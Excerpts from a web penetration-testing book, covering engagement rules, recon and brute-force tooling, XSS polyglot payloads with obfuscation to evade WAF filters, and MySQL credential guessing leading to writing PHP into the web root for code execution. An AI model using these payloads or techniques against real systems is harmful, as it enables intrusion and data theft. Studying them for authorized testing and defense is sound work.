Becoming The Hacker - Adrian Pruteanu
Every effort has been made in the preparation of this book to ensure
the accuracy of the information presented. However, the information
contained in this book is sold without warranty, either express or
implied. Neither the authors, nor Packt Publishing or its dealers and
distributors, will be held liable for any damages caused or alleged to
have been caused directly or indirectly by this book.
Livery Place
35 Livery Street
ISBN 978-1-78862-796-2
www.packtpub.com
mapt.io
Mapt is an online digital library that gives you full access to over
5,000 books and videos, as well as industry leading tools to help you
plan your personal development and advance your career. For more
information, please visit our website.
Why subscribe?
Spend less time learning and more time coding with practical
eBooks and Videos from over 4,000 industry professionals
Learn better with Skill Plans built especially for you
Get a free eBook or video every month
Mapt is fully searchable
Copy and paste, print, and bookmark content
Packt.com
Did you know that Packt offers eBook versions of every book
published, with PDF and ePub files available? You can upgrade to
the eBook version at www.Packt.com and as a print book customer,
you are entitled to a discount on the eBook copy. Get in touch with
us at [email protected] for more details.
In his spare time, Adrian likes to develop new tools and software to
aid with penetration testing efforts or just to keep users safe online.
He may occasionally go after a bug bounty or two, and he likes to
spend time researching and (responsibly) disclosing vulnerabilities.
"A special thank you to my family and friends for their support and
mentorship, as well. I also thank my parents, in particular, for
bringing home that Siemens PC and showing me BASIC, igniting
my love for computers at a young age. They've always nurtured
my obsession with technology, and for that I am forever grateful."
About the reviewer
Babak Esmaeili has been working in the cyber security field for
more than 15 years. He started in this field from reverse engineering
and continued his career in the penetration testing field.
"I want to thank everyone who helped in writing this book, and I'd
like to thank my beloved parents and dearest friends for their
support."
Packt is searching for authors
like you
If you're interested in becoming an author for Packt, please
visit authors.packtpub.com and apply today. We have worked with
thousands of developers and tech professionals, just like you, to help
them share their insight with the global tech community. You can
make a general application, apply for a specific hot topic that we are
recruiting an author for, or submit your own idea.
Preface
Becoming the Hacker will teach you how to approach web
penetration testing with an attacker's mindset. While testing web
applications for performance is common, the ever-changing threat
landscape makes security testing much more difficult for the
defender.
Through the first part of the book, Adrian Pruteanu walks you
through commonly encountered vulnerabilities and how to take
advantage of them to achieve your goal. The latter part of the book
shifts gears and puts the newly learned techniques into practice,
going over scenarios where the target may be a popular content
management system or a containerized application and its network.
Chapter 5, File Inclusion Attacks, helps you explore the file inclusion
vulnerabilities. We also look at several methods to use an
application's underlying filesystem to our advantage.
Chapter 11, Attacking APIs, focuses our attention on APIs and how
to effectively test and attack them. All of the skills you have learned
up to this point will come in handy.
We also have other code bundles from our rich catalog of books and
videos available at https://github.com/PacktPublishing/. Check them
out!
Conventions used
There are a number of text conventions used throughout this book.
[default]
exten => s,1,Dial(Zap/1|30)
exten => s,2,Voicemail(u100)
exten => s,102,Voicemail(b100)
exten => i,1,Voicemail(s0)
# cp /usr/src/asterisk-addons/configs/cdr_mysql.conf.sample /etc/asterisk/cdr_mysql.conf
Note
Warnings or important notes appear like this.
Tip
Tips and tricks appear like this.
Get in touch
Feedback from our readers is always welcome.
Piracy: If you come across any illegal copies of our works in any
form on the Internet, we would be grateful if you would provide us
with the location address or website name. Please contact us at
[email protected] with a link to the material.
Reviews
Please leave a review. Once you have read and used this book, why
not leave a review on the site that you purchased it from? Potential
readers can then see and use your unbiased opinion to make
purchase decisions, we at Packt can understand what you think
about our products, and our authors can see your feedback on their
book. Thank you!
Some assumptions about your knowledge level are made. To get the
most value out of reading this book, a basic knowledge of application
security should be there. Readers do not have to be experts in the
field of penetration testing or application security, but they should
have an idea about what cross-site scripting (XSS) or SQL
injection (SQLi) attacks are. We will not devote a chapter to the
standard "Hello World" example for XSS, but we will show the impact
of exploiting such a vulnerability. The reader should also be familiar
with the Linux command prompt and common console tools, such as
curl, git, and wget. Some familiarity with programming will certainly
help, but it is not a hard requirement.
Rules of engagement
Before moving forward with the fun stuff, it is important to always
remember the rules of engagement (ROE) when conducting an
attack. The ROE are typically written out in the pre-engagement
statement of work (SoW) and all testers must adhere to them. They
outline expectations of the tester and set some limits to what can be
done during the engagement.
Communication
Good communication is key to a successful engagement. Kickoff
and close-out meetings are extremely valuable to both parties
involved. The client should be well aware of who is performing the
exercise, and how they can reach them, or a backup, in case of an
emergency.
Has the scope changed since the document's last revision? Has
the target list changed? Should certain parts of the application
or network be avoided?
Is there a testing window to which you must adhere?
Are the target applications in production or in a development
environment? Are they customer-facing or internal only?
Are the emergency contacts still valid?
If credentials were provided, are they still valid? Now is the time
to check these again.
Is there an application firewall that may hinder testing?
The goal is generally to test the application and not third-party
defenses. Penetration testers have deadlines, while malicious actors
do not.
Tip
When testing an application for vulnerabilities, it is a good idea to
ask the client to whitelist our IPs in any third-party web
application firewalls (WAFs). WAFs inspect traffic reaching the
protected application and will drop requests that match known
attack signatures or patterns. Some clients will choose to keep
the WAF in an enforcing mode, as their goal may be to simulate
a real-world attack. This is when you should remind the clients
that firewalls can introduce delays in assessing the actual
application, as the tester may have to spend extra time
attempting to evade defenses. Further, since there is a time limit
to most engagements, the final report may not accurately reflect
the security posture of the application.
Tip
No manager wants to hear that their critical application may go
offline during a test, but this does occasionally happen. Some
applications cannot handle the increased workload of a simple
scan and will fail over. Certain payloads can also break poorly-
designed applications or infrastructure, and may bring
productivity to a grinding halt.
Tip
If, during a test, an application becomes unresponsive, it's a
good idea to call the primary contact, informing them of this as
soon as possible, especially if the application is a critical
production system. If the client is unavailable by phone, then be
sure to send an email alert at minimum.
Privacy considerations
Engagements that involve any kind of social engineering or human
interaction, such as phishing exercises, should be carefully
handled. A phishing attack attempts to trick a user into following an
email link to a credential stealer, or opening a malicious attachment,
and some employees may be uncomfortable being used in this
manner.
Unless there is explicit written permission from the client, avoid the
following:
Note
Some web attacks, such as SQLi or XML External Entity (XXE),
may lead to data leaks, in which case you should inform the
client of the vulnerability as soon as possible and securely
destroy anything already downloaded.
Cleaning up
A successful penetration test or application assessment will
undoubtedly leave many traces of the activity behind. Log entries
could show how the intrusion was possible and a shell history file
can provide clues as to how the attacker moved laterally. There is a
benefit in leaving breadcrumbs behind, however. The defenders,
also referred to as the blue team, can analyze the activity during or
post-engagement and evaluate the efficacy of their defenses. Log
entries provide valuable information on how the attacker was able to
bypass the system defenses and execute code, exfiltrate data, or
otherwise breach the network.
There are many tools to wipe logs post-exploitation, but unless the
client has explicitly permitted these actions, this practice should be
avoided. There are instances where the blue team may want to test
the resilience of their security information and event management
(SIEM) infrastructure (a centralized log collection and analysis
system), so wiping logs may be in scope, but this should be explicitly
allowed in the engagement documents.
That being said, there are certain artifacts that should almost always
be completely removed from systems or application databases when
the engagement has completed. The following artifacts can expose
the client to unnecessary risk, even after they've patched the
vulnerabilities:
Tip
Make a note of all malicious files, paths, and payloads used in
the assessment. At the end of the engagement, attempt to
remove as much as possible. If anything is left behind, inform the
primary contact, providing details and stressing the importance of
removing the artifacts.
Tip
Tagging payloads with a unique keyword can help to identify
bogus data during the cleanup effort, for example: "Please
remove any database records that contain the keyword:
2017Q3TestXyZ123."
Kali Linux
Previously known as BackTrack, Kali Linux has been the Linux
distribution of choice for penetration testers for many years. It is hard
to argue with its value, as it incorporates almost all of the tools
required to do application and network assessments. The Kali Linux
team also provides regular updates, keeping not only the OS but
also the attack tools current.
Burp Suite
Burp Suite is arguably the king when it comes to attack proxies. It
allows you to intercept, change, replay, and record traffic out of the
box. Burp Suite is highly extendable, with powerful community
plugins that integrate with sqlmap (the de facto SQLi exploitation
tool), automatically test for privilege escalation, and offer other useful
modules:
The attacker's job will always be easier than that of the defender.
Any professional hacker with experience in the corporate world will
attest to this. The attacker needs just one weak link in the chain —
even if that weakness is temporary — to own the environment
completely.
Security is difficult to do right the first time and it is even more difficult
to keep it close to the baseline as time passes. There are often
resourcing issues, lack of knowledge, or wrong priorities, including
simply making the organization profitable. Applications have to be
usable — they must be available and provide feature
enhancements to be useful. There never seems to be enough time
to test the code properly, let alone to test it for security bugs.
Types of assessments
Depending on the agreement with the client prior to the engagement,
you may have some of the information required, a lot of information,
or no information whatsoever. White-box testing allows for a
thorough examination of the application. In this case, the attackers
have essentially the same access as the developer. They not only
have authenticated access to the application, but also its source
code, any design documents, and anything else they'll need.
Note
For the remainder of this book, we will approach our targets from
a more gray-box perspective, simulating the typical engagement.
Target mapping
The traditional nmap of the entire port range, with service discovery, is
always a good place to start when gathering information on a target.
Nmap is the network scanning tool of choice and has been for many
years. It is still very powerful and very relevant. It is available on
most platforms, including Kali, BlackArch, and even Windows.
In the Kali console prompt, start the PostgreSQL service using the
service command. If successful, there should be no message
returned:
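A minimal sketch of that step (the service name is standard on Kali; a silent return indicates success):

root@kali:~# service postgresql start
root@kali:~#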
root@kali:~# msfconsole
[...]
msf > db_status
[*] postgresql selected, no connection
msf >
root@kali:~# msfconsole
[...]
msf >
The YML database configuration file, created with the msfdb init
command, can be passed to the db_connect Metasploit console
command with the -y switch:
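As a sketch, assuming the default Kali location of the Metasploit database configuration file:

msf > db_connect -y /usr/share/metasploit-framework/config/database.yml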
We can now create a workspace for the target application, which will
help us to organize results from various MSF modules, scans, or
exploits:
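For example, with a hypothetical workspace name (use whatever matches your engagement):

msf > workspace -a target_app
[*] Added workspace: target_app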
MSF's db_nmap takes the same switches as the normal nmap. In the
following example, we are scanning for common ports and
interrogating running services.
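A sketch of such a scan, with a placeholder hostname standing in for the in-scope target (-A performs service and OS interrogation, -Pn skips host discovery):

msf > db_nmap -v -A -Pn target.app.internal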
Note
Take note of the scope provided by the client. Some will
specifically constrain application testing to one port, or
sometimes even only one subdomain or URL. The scoping call is
where the client should be urged not to limit the attack surface
available to the tester.
Masscan
Nmap is fully featured, with a ton of options and capabilities, but
there is one problem: speed. For large network segments, Nmap can
be very slow and sometimes can fail altogether. It's not unusual for
clients to request a penetration test on a huge IP space with little
time allotted for the mapping and scanning phase.
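For illustration, a scan along these lines is the kind of run the next paragraph interrupts with Ctrl + C; the range, ports, and rate are placeholders and should be tuned to what the network can tolerate:

root@kali:~# masscan -p80,443,8080,8443 10.0.0.0/8 --rate 10000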
We can see that the preceding scan was cancelled early with the Ctrl
+ C interrupt, and masscan saved its progress in a paused.conf file,
allowing us to resume the scan at a later time. To pick up where we
left off, we can use the --resume switch, passing the paused.conf file
as the parameter:
Figure 2.2: Resuming a masscan session
Masscan's results can then be fed into either Nmap for further
processing, or a web scanner for more in-depth vulnerability
discovery.
WhatWeb
Once we've identified one or more web applications in the target
environment with masscan or Nmap, we can start digging a bit
deeper. WhatWeb is a simple, yet effective, tool that can look at a
particular web application and identify what technologies have been
used to develop and run it. It has more than 1,000 plugins, which can
passively identify everything from what content management
system (CMS) is running on the application, to what version of
Apache or NGINX is powering the whole thing.
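A quick sketch of a run against the example host used later in this chapter, with a slightly raised aggression level (the hostname is illustrative):

root@kali:~# whatweb -a 3 vuln.app.local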
Nikto
Nikto provides value during the initial phases of the engagement. It
is fairly non-intrusive and with its built-in plugins, it can provide quick
insight into the application. It also offers some more aggressive
scanning features that may yield success on older applications or
infrastructure.
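A minimal sketch of a Nikto run against the same example host:

root@kali:~# nikto -h vuln.app.local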
CMS scanners
When the target is using a CMS, such as Joomla, Drupal, or
WordPress, running an automated vulnerability testing tool should
be your next step.
WordPress is not alone in this space. Joomla and Drupal are also
very popular and sport many of the same vulnerabilities and
configuration issues that are seen in WordPress installations.
There are a few scanners available for free that aim to test for low-
hanging fruit in these CMSs:
Note
Before proceeding with a WordPress scan, make sure that it is
hosted inside the engagement scope. Some CMS
implementations will host the core site locally, but the plugins or
content directories are on a separate content delivery network
(CDN). These CDN hosts may be subject to a penetration testing
notification form before they can be included in the test.
We will cover CMS assessment tools, such as WPScan, in more
detail in later chapters.
Efficient brute-forcing
A brute-force attack typically involves a barrage of requests, or
guesses, to gain access or reveal information that may be otherwise
hidden. We may brute-force a login form on an administrative panel
in order to look for commonly used passwords or usernames. We
may also brute-force a web application's root directory looking for
common misconfiguration and misplaced sensitive files.
Note
An alternative, or supplement, to SecLists is FuzzDB. It is a
similar collection of files containing various payloads that can
help with brute-forcing, and it can also be downloaded from the
GitHub repository at https://github.com/fuzzdb-project/fuzzdb.
Grabbing the latest copy of SecLists is easy using git, a popular
version control system tool. We can pull down the repository using
the git clone command:
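For example, cloning into the current working directory:

root@kali:~# git clone https://github.com/danielmiessler/SecLists.git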
SecList
Description
Wordlist
You can make assumptions about the application based on the very
simple information shown in the preceding list. For example, an IIS
web server is more likely to have an application developed in
ASP.NET as opposed to PHP. While PHP is still available on
Windows (via XAMPP), it is not as commonly encountered in
production environments. In contrast, while there are Active Server
Pages (ASP) processors on Linux systems, PHP or Node.js are
much more common these days. While brute-forcing for files, you
can take this into account when attaching the extension to the
payload: .asp and .aspx for Windows targets, and .php for Linux
targets is a good start.
User-agent: *
Disallow: /cgi-bin/
Disallow: /test/
Disallow: /~admin/
Google's crawlers will ignore the subdirectories, but you cannot. This
is valuable information for the upcoming scans.
Content discovery
We have already mentioned two tools that are very useful for initial
discovery scans: OWASP ZAP and Burp Suite. Burp's Intruder
module is throttled in the free version but can still be useful for quick
checks. Both of these attack proxies are available in Kali Linux and
can be easily downloaded for other distributions. There are other
command-line alternatives, such as Gobuster, which can be used to
automate the process a bit more.
Burp Suite
As mentioned, Burp Suite comes bundled with the Intruder module,
which allows us to easily perform content discovery. We can
leverage it to look for hidden directories and files, and even guess
credentials. It supports payload processing and encoding, which
enables us to customize our scanning to better interface with the
target application.
OWASP ZAP
The free alternative to Burp Suite is ZAP, a powerful tool in its own
right, and it provides some of the discovery capabilities of Burp
Suite.
The ZAP equivalent for Burp's Intruder is the Fuzzer module, and it
has similar functionality, as shown in the following figure:
Figure 2.6: OWASP ZAP's Fuzzer module configuration

As ZAP is open-source, there are no usage restrictions. If the goal is to perform a quick
content discovery scan or credential brute-force, it may be a better alternative to the free
version of Burp Suite.
Gobuster
Gobuster is an efficient command-line utility for content discovery.
Gobuster does not come preinstalled on Kali Linux, but it is available
on GitHub. As its name implies, Gobuster was written in the Go
language and will require the golang compiler to be installed before it
can be used for an attack.
We can now pull the latest version of Gobuster from GitHub using
the git clone command:
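One possible sequence, assuming the golang toolchain is already installed and that dependencies are fetched before building (the working directory is illustrative):

root@kali:~/tools# git clone https://github.com/OJ/gobuster.git
root@kali:~/tools# cd gobuster
root@kali:~/tools/gobuster# go get && go build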
If the commands don't produce output, the tool was compiled and is
ready for use:
root@kali:~/tools/gobuster# ./gobuster

Gobuster v1.3                OJ Reeves (@TheColonial)
=====================================================
[!] WordList (-w): Must be specified
[!] Url/Domain (-u): Must be specified
=====================================================
root@kali:~/tools/gobuster#
Disallow: /cgi-bin/
Disallow: /test/
Disallow: /~admin/
Make sure that the cursor is placed at the end of the URL in the left-
most pane. Click the Add button next to Fuzz Locations in the right-
most pane:
Figure 2.9: Fuzzer configuration, adding Fuzz Locations
On the next screen, we can add a new payload to feed the Fuzzer.
We will select the raft-small-files.txt wordlist from the SecLists
repository:
Figure 2.10: Fuzzer configuration – the Add Payload screen
Since we want to treat the /~admin URI as a directory and look for
files within, we will have to use a string processor for the selected
payload. This will be a simple Prefix String processor, which will
prepend a forward-slash to each entry in our list.
Figure 2.11: Fuzzer configuration – the Add Processor screen
The Fuzzer task may take a while to complete, and it will produce
lots of 403 or 404 errors. In this case, we were able to locate a
somewhat hidden administration file.
Figure 2.12: The completed Fuzzer scan shows an accessible hidden file
The HTTP 200 response indicates that we have access to this file,
even though the parent directory /~admin/ was inaccessible. It
appears we have access to the admin.html file contained within the
enticing admin directory.
Payload processing
Burp Suite's Intruder module is a powerful ally to an attacker when
targeting web applications. Earlier discovery scans have identified
the secretive, but enticing, /~admin/ directory. A subsequent scan of
the directory itself uncovered an unprotected admin.html file.
Before we proceed, we will switch to the Burp Suite attack proxy and
configure the Target Scope to the vuln.app.local domain:
Figure 2.13: The Burp Suite Target Scope configuration screen
The Target Scope allows us to define hosts, ports, or URLs that are
to be included in the scope of the attack. This helps to filter out traffic
that may not be related to our target. With Burp Suite configured as
our attack proxy, we can visit the hidden admin.html URL and record
the traffic in our proxy's history:
Figure 2.14: Accessing the hidden file through the browser succeeds
Since all of the interactions with the target are being recorded by the
Burp proxy, we can simply pass the failed request on to the Intruder
module, as shown in the following figure. Intruder will let us attack
the basic authentication mechanism with little effort:
Figure 2.16: The HTTP history screen
In the Intruder module, the defaults are good for the most part—we
just have to select the Base64-encoded credentials portion of the
Authorization header and click the Add button on the right-hand
side. This will identify this position in the HTTP request as the
payload location.
This figure shows that the list was loaded in payload position 1 using
the Load... button in the Payload Options:
Figure 2.20: Payload position 1 configuration screen
The separator for position 1 should be a colon (:). For payload position
2, you can use the 500-worst-passwords.txt list from the SecLists
passwords directory.
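For reference, the value Intruder submits on each guess is simply the Base64 encoding of username:password, which you can reproduce in a terminal (the credentials here are placeholders):

root@kali:~# echo -n 'admin:admin' | base64
YWRtaW46YWRtaW4=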
Once the payload has been configured, we can begin the brute-force
using the Start Attack button in the top-right corner of the Intruder
module, as shown in the following figure:
Credential brute-forcing is just one of the many uses for Intruder. You
can get creative with custom payloads and payload processing.
This figure shows that the PDF's name, minus the extension, is
identified as the payload position using the Add button:
Figure 2.26: Intruder Payload Positions configuration screen
The following figure shows the Dates payload type options available
in Intruder:
Figure 2.27: Intruder's Payloads screen
In this attack, you will use the Dates payload type with the proper
date format, going back a couple of years. The payload processor
will be the MD5 hash generator, which will generate a hash of each
date and return the equivalent string. This is similar to our Base64-
encode processor from the previous attack.
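To illustrate what the processor produces, the MD5 of a single date can also be computed manually; the YYYY-MM-DD format here is only an assumption about how the target names its files:

root@kali:~# echo -n '2017-06-20' | md5sum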
Once again, the payload options have been configured and we can
start the attack.
The following figure shows a few requests with the 200 HTTP status
code and a large length indicating a PDF file is available for
download:
Intruder will generate the payload list based on our specified date
format and calculate the hash of the string, before sending it to the
application, all with a few clicks. In no time, we have discovered at
least three improperly protected, potentially sensitive documents that
are available anonymously.
Polyglot payloads
A polyglot payload is defined as a piece of code that can be
executed in multiple contexts in the application. These types of
payloads are popular with attackers because they can quickly test an
application's input controls for any weaknesses, with minimal noise.
Any one of the steps along the way can alter or block the payload,
which may make it more difficult to confirm the existence of a
vulnerability in the application. A polyglot payload will attempt to
exploit an injection vulnerability by combining multiple methods for
executing code in the same stream. This attempts to exploit
weaknesses in the application payload filtering, increasing the
chance that at least one portion of the code will be missed and will
execute successfully. This is made possible by the fact that
JavaScript is a very forgiving language. Browsers have always
presented a low barrier to entry for developers, and JavaScript is rooted
in a similar philosophy.
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
At first glance, this appears rather messy, but every character has a
purpose. This payload was designed to execute JavaScript in a
variety of contexts, whether the code is reflected inside an HTML tag
or right in the middle of another piece of JavaScript. The browser's
HTML and JavaScript parsers are extremely accommodating. They
are case-insensitive, error-friendly, and they don't care much about
indenting, line endings, or spacing. Escaped or encoded characters
are sometimes converted back to their original form and injected into
the page. JavaScript in particular does its very best to execute
whatever code is passed to it. A good polyglot payload will take
advantage of all of this, and seek to evade some filtering as well.
The first thing a sharp eye will notice is that most of the keywords,
such as textarea, javascript, and onload, are randomly capitalized:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
This may seem like a futile attempt to evade application firewall input
filters, but you'd be surprised how many are poorly designed.
Consider the following regular expression (regex) input filter:
s/onclick=[a-z]+\(.+\)//g
Note
A regex is a piece of text defining a search pattern. Some WAFs
may use regex to try and find potentially dangerous strings inside
HTTP requests.
This will effectively prevent JavaScript code from being injected via
the onclick event, but with one glaring flaw: it doesn't take into
account case-sensitivity. Regular expressions have many modifiers,
such as the g in the preceding example, but most engines are
case-sensitive by default unless the i modifier is supplied. Without it,
the mixed-case oNcliCk never matches and the filter can be bypassed.
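As a minimal illustration, appending the i modifier (and nothing else) closes this particular gap, although the filter remains weak against other event handlers and encodings:

s/onclick=[a-z]+\(.+\)//gi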
Tip
When assessing an application's regex-based input filter,
Regex101 is a great place to test it against several payloads at
once. Regex101 is an online tool available for free at
https://regex101.com.
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Note
Scalable Vector Graphics (SVG) is an element on a page that
can be used to draw complex graphics on the screen without
binary data. SVG is used in XSS attacks mainly because it
provides an onload property, which will execute arbitrary
JavaScript code when the element is rendered by the browser.
Note
More examples of the power of this particular polyglot are on
Elsobky's GitHub page: https://github.com/0xSobky.
The URL-encoded characters %0d and %0a represent a carriage return
and a newline, respectively. These characters are largely ignored by
HTML and JavaScript parsers, but they are significant in HTTP request
or response headers.
GET /save.php?remember=jaVasCript%3A%2F*-%2F*%60%2F*%60%2F*'%2F*%22%2F**%2F(%2F*%20*%2FoNcliCk%3Dalert()%20)%2F%2F%0D%0A%0d%0a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--!%3E%3CsVg%2F%3CsVg%2FoNloAd%3Dalert()%2F%2F%3E%3E HTTP/1.1
Host: www.cb2.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: nginx/1.8.1
Set-Cookie: remember_me=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//
//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Connection: close

Username saved!
This figure shows how the browser views the HTML code after the
payload has been processed:
We can test this behavior inside the browser console with the
preceding sample code:
(/* */oNcliCk=alert()
)
Code obfuscation
Not all application firewalls strip input of malicious strings and let the
rest go through. Some inline solutions will drop the connection
outright, usually in the form of a 403 or 500 HTTP response. In such
cases, it may be difficult to determine which part of the payload is
considered safe and which triggered the block.
By design, inline firewalls have to be fairly fast and they cannot
introduce significant delay when processing incoming data. The
result is usually simple logic when attempting to detect SQL
injection (SQLi) or XSS attacks. Random capitalization may not fool
these filters, but you can safely assume that they do not render on
the fly every requested HTML page, let alone execute JavaScript to
look for malicious behavior. More often than not, inline application
firewalls will look for certain keywords and label the input as
potentially malicious. For example, alert() may trigger the block,
while alert by itself would produce too many false-positives.
This figure shows how we can access the same function directly or
using array notation, with an "alert" string inside square brackets:
This figure shows how we can call the alert() function using the
obfuscated string:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=top[8680439..toString(30)]() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=top[8680439..toString(30)]()//>\x3e
Tip
The top keyword is a synonym for window and can be used to
reference anything you need from the window object.
With just a minor change, the polyglot payload is still effective and is
now more likely to bypass rudimentary inline filters that may attempt
to filter or block the discovery attempts.
Brutelogic offers a great list of XSS payloads with many other ways
to execute code unconventionally at
https://brutelogic.com.br/blog/cheat-sheet/.
Resources
Consult the following resources for more information on penetration
testing tools and techniques:
Metasploit: https://www.metasploit.com/
WPScan: https://wpscan.org/
CMSmap: https://github.com/Dionach/CMSmap
Recon-NG (available in Kali Linux or via the Bitbucket
repository): https://bitbucket.org/LaNMaSteR53/recon-ng
OWASP XSS Filter Evasion Cheat Sheet:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Elsobky's GitHub page: https://github.com/0xSobky
Brutelogic cheat sheet: https://brutelogic.com.br/blog/cheat-sheet/
SecLists repository: https://github.com/danielmiessler/SecLists
FuzzDB: https://github.com/fuzzdb-project/fuzzdb
Exercises
Complete the following exercises:
Time-tested tools, such as Nmap and Nikto, can give us a head start,
while WPScan and CMSmap can hammer away at complex CMS
that are frequently misconfigured and seldom updated. For larger
networks, masscan can quickly identify interesting ports, such as
those related to web applications, allowing for more specialized
tools, such as WhatWeb and WPScan, to do their job faster.
Web content and vulnerability discovery scans with Burp or ZAP can
be improved with proper wordlists from repositories, such as
SecLists and FuzzDB. These collections of known and interesting
URLs, usernames, passwords, and fuzzing payloads can greatly
improve scan success and efficiency.
Network assessment
We've seen in previous chapters that Metasploit's workspace feature
can be very useful. In the following engagement, we will make use of
it as well. First, we have to launch the console from the terminal
using the msfconsole command. Once Metasploit has finished
loading, it will drop us into the familiar msf > prompt.
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...
msf >
Before we hammer away at the web interface and try to exploit some
obscure vulnerability, let's take a step back and see what other
services are exposed on the API's server. The hope here is that
while the API itself may have been closely scrutinized by developers,
who may have taken security seriously during the development life
cycle, mistakes may have been made when deploying the server
itself. There are many aspects of system hardening that simply
cannot be controlled within the source code repository. This is
especially true when the server housing the target application is a
shared resource. This increases the likelihood that the system
security policy will loosen up over time as different teams with
different requirements interact with it. There could be some
development instance with less stringent controls running on a non-
standard port, or a forgotten and vulnerable application that can give
us (as an attacker) the required access, and we can easily
compromise the target.
Since we've wrapped the Nmap scan using the Metasploit db_nmap
command, the results are automatically parsed and written to our
workspace's database. Once the scan is complete, we can review
the entries in the database by issuing the services command:
Instead of going at the application head on, over port 80, we hope to
attack it via the exposed MySQL (MariaDB) services, as this attack
path figure shows:
The Basic options section lists the variables we will need to update in
order for the module to execute properly. The RHOSTS, RPORT, and
THREADS parameters are required for this particular scanner. RHOSTS,
or remote hosts, and RPORT, or remote port, should be self-
explanatory. The THREADS option can be increased to a higher
number to increase scan speed, but since we are only targeting one
remote host, api.ecorp.local, we don't need more than one
scanning thread.
With the module loaded, we can set the required RHOSTS variable to
the appropriate target. Since the target was already scanned by
db_nmap, and the results are in the ecorp workspace, we can use the
services command to set the RHOSTS variable automatically to all
MySQL servers found, as follows:
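A sketch of that one-liner; the -s option filters by identified service name and -R copies the matching hosts into RHOSTS (verify the exact flags against your Metasploit version):

msf > services -s mysql -R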
There are other ways to query the services in the workspace. For
example, in the preceding command-line input, we used the -s
option, which filters all hosts running MySQL as an identified service.
It appears that the module was able to identify the MySQL server
version successfully. This will prove useful when looking for known
vulnerabilities.
If we issue another services query, you will notice that the info field
for the mysql service has changed to the results of the mysql_version
scan, as follows:
Where our Nmap scan fell short in identifying the version number,
Metasploit succeeded and automatically changed the database to
reflect this. After reviewing the public CVEs for MySQL, however, it
doesn't appear that this instance has any unauthenticated
vulnerabilities.
Back in the Kali Linux terminal, we can use the mysql client
command to attempt to authenticate as root (-u) to the
api.ecorp.local host (-h):
root@kali:~# mysql -uroot -hapi.ecorp.local
ERROR 1045 (28000): Access denied for user
'root'@'attacker.c2' (using password: NO)
root@kali:~#
Note the lack of space between the -u and -h switches and their
respective values. A quick check for an empty root password fails,
but it proves that the MySQL server is accepting connections from
remote addresses.
Credential guessing
Since we were unable to uncover a working remote exploit for the
MySQL instance, the next step is to attempt a credentialed brute-
force attack against the default MySQL root user. We will use one of
our curated commonly used password dictionaries and hope this
instance was not properly secured during deployment.
Before continuing, we will set the following values to make the scan
a bit more efficient and reduce some noise:
Increasing the THREADS count will help you to get through the scan
more quickly, although it can be more noticeable. More threads
means more connections to the service. If this particular host is not
very resilient, we may crash it, thereby alerting the defenders. If our
goal is to be quieter, we can use only one thread but the scan will
take much longer. The VERBOSE variable should be set to false, as
you will be testing lots of passwords and the console output can get
messy. An added bonus to non-verbose output is that it improves the
scan time significantly, since Metasploit does not have to output
something to the screen after every attempt. Finally, with
STOP_ON_SUCCESS set to true, we will stop the attack if we have a
successful login.
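A sketch of those options, together with a username and wordlist for the scanner; the THREADS value and the exact SecLists path are assumptions to adapt to your own checkout and risk tolerance:

msf > set USERNAME root
msf > set PASS_FILE ~/tools/SecLists/Passwords/Common-Credentials/10-million-password-list-top-500.txt
msf > set THREADS 3
msf > set VERBOSE false
msf > set STOP_ON_SUCCESS true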
This is a good place to start. There are other top variations of the 10
million password list file, and if this one fails to produce a valid login,
we can try the top 1,000, 10,000, or other wordlists.
Much like every other module in Metasploit, the run command will
begin execution:
We can connect directly from our Kali Linux instance using the mysql
command once more. The -u switch will specify the username and
the -p switch will let us pass the newly discovered password. There's
no space between the switches and their values. If we omit a value
for -p, the client will prompt us for a password.
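A sketch of that connection, with a placeholder where the recovered password would go:

root@kali:~# mysql -uroot -p<recovered_password> -hapi.ecorp.local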
Tip
There is a Metasploit module (surprise, surprise) that can deliver
executables and initiate a reverse shell using known credentials.
For Windows machines, exploit/windows/mysql/mysql_payload
can upload a Meterpreter shell and execute it, although there are
some drawbacks. A standard Metasploit payload will likely be
picked up by antivirus (AV) software and alert the defenders to
your activities. Bypassing AVs is possible with a fully
undetectable (FUD) Metasploit payload, but for the scenario in
this chapter, we will go with a simpler, less risky option.
Now let's find out where we are on the disk, so that we can write the
payload to the appropriate web application directory. The SHOW
VARIABLES SQL query lets us see configuration data and the WHERE
clause limits the output to directory information only, as shown here:
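A sketch of that query, issued from the MySQL client session established earlier:

SHOW VARIABLES WHERE Variable_name LIKE '%dir';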
root@kali:~# curl http://api.ecorp.local/xampp/.version
5.6.31
root@kali:~#
Back to the MySQL command-line interface, and we can try to write
to that directory using MySQL's SELECT INTO OUTFILE query. If we can
put a PHP file somewhere inside htdocs, we should be able to call it
from a web browser or curl, and we will have code execution.
Let's plug in some test values and see if we can write to the target
directory, and more importantly, if the application web server will
process our PHP code correctly:
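One way to sketch that test is to write a phpinfo() probe into the XAMPP web root identified earlier; the path and filename are assumptions based on that output, and the comment flag matches the cleanup note below:

SELECT "<?php phpinfo(); /* ECorpAppTest11251 */ ?>" INTO OUTFILE 'c:/xampp/htdocs/xampp/phpinfo.php';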
Note
The ECorpAppTest11251 flag is added as a comment, in case we
are unable to clean up this shell after the test is complete, and
